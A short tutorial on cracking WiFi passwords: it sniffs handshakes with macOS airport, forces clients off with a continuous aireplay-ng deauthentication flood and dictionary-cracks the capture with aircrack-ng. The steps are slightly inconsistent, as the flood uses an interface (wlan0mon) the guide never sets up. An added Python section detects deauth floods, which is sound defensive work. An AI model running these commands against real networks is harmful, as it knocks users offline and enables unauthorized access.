WiFi Password Cracking

1 Principle

Sending a disconnect request disconnects all devices connected to the target WiFi. The devices then reconnect, and when one of them re-establishes its connection with the WiFi, listening on the channel captures the handshake packets, which contain the password ciphertext. The capture is then cracked offline with aircrack-ng.

2 Steps

2.1 Scan nearby SSIDs

Run this command to list the nearby SSIDs:

sudo /System/Library/PrivateFrameworks/Apple80211.framework/Versions/A/Resources/airport -s

After setting up a shortcut for the command, it becomes:

airport -s

2.2 Capture the handshake

Note: aircrack-ng needs to be installed first on macOS:

brew install aircrack-ng

airport en0 sniff channel

After waiting for a while, press CTRL+C to stop listening.

Check whether the capture file contains a handshake (that is, whether it contains the password information):

sudo aircrack-ng /tmp/airportSniffTRT4xj.cap

Note: Because more than one WiFi network may be using the same channel, multiple networks may be detected.

2.3 DeAuth flood attack

sudo aireplay-ng -0 0 -a WIFI physical address -c User equipment physical address wlan0mon

The parameter -0 3 means sending 3 times, and -0 0 means sending continuously. Omitting the -c parameter disconnects all clients.

2.4 Crack the handshake capture

sudo aircrack-ng /tmp/airportSniffTRT4xj.cap -w dictionary path
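
From the monitoring side, the continuous disconnect traffic in step 2.3 shows up as a burst of 802.11 deauthentication frames for the same access point and client. The following is an added example, not part of the original post: a sliding-window detector over raw management frames. It assumes frames arrive with any radiotap header already stripped; the function names, the threshold of 10 frames per second and the sample capture are constructed for illustration.

```python
from collections import defaultdict

DEAUTH_SUBTYPE = 0xC  # 802.11 management frame subtype 12 = deauthentication
BROADCAST = "ff:ff:ff:ff:ff:ff"

def mac(b):
    return ":".join(f"{x:02x}" for x in b)

def parse_deauth(frame):
    """Return (dest, src, bssid, reason) for a deauth frame, else None."""
    if len(frame) < 26:  # 24-byte management header + 2-byte reason code
        return None
    version, ftype, subtype = frame[0] & 3, (frame[0] >> 2) & 3, frame[0] >> 4
    if (version, ftype, subtype) != (0, 0, DEAUTH_SUBTYPE):
        return None
    reason = int.from_bytes(frame[24:26], "little")
    return mac(frame[4:10]), mac(frame[10:16]), mac(frame[16:22]), reason

def detect_floods(records, window_ms=1000, threshold=10):
    """records: (timestamp_ms, raw_frame) pairs. One alert per (bssid, target)."""
    recent, alerts = defaultdict(list), {}
    for ts, raw in sorted(records, key=lambda r: r[0]):
        parsed = parse_deauth(raw)
        if parsed is None:
            continue
        dest, _src, bssid, reason = parsed
        times = recent[(bssid, dest)]
        times.append(ts)
        while times[0] < ts - window_ms:  # slide the window forward
            times.pop(0)
        if len(times) >= threshold and (bssid, dest) not in alerts:
            alerts[(bssid, dest)] = {"bssid": bssid, "target": dest, "reason": reason,
                                     "all_clients": dest == BROADCAST,
                                     "first_alert_ms": ts, "count": len(times)}
    return list(alerts.values())

# Constructed sample capture (hex of frame control, duration, addr1-3, seq, body).
AP, CLIENT, OTHER = "020000000001", "0200000000aa", "0200000000bb"
def sample(fc, dest, body):
    return bytes.fromhex(fc + "0000" + dest + AP + AP + "0000" + body)

SAMPLE = [(i * 20, sample("c000", CLIENT, "0700")) for i in range(30)]  # burst
SAMPLE.append((5000, sample("c000", OTHER, "0300")))             # single, normal
SAMPLE.append((100, sample("8000", "ffffffffffff", "00" * 12)))  # beacon, ignored

if __name__ == "__main__":
    for alert in detect_floods(SAMPLE):
        print(alert)
```

A single deauthentication frame is normal when a client leaves a network, which is why the detector alerts only on a sustained rate; an alert with all_clients set corresponds to the broadcast case where no -c client address is given.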
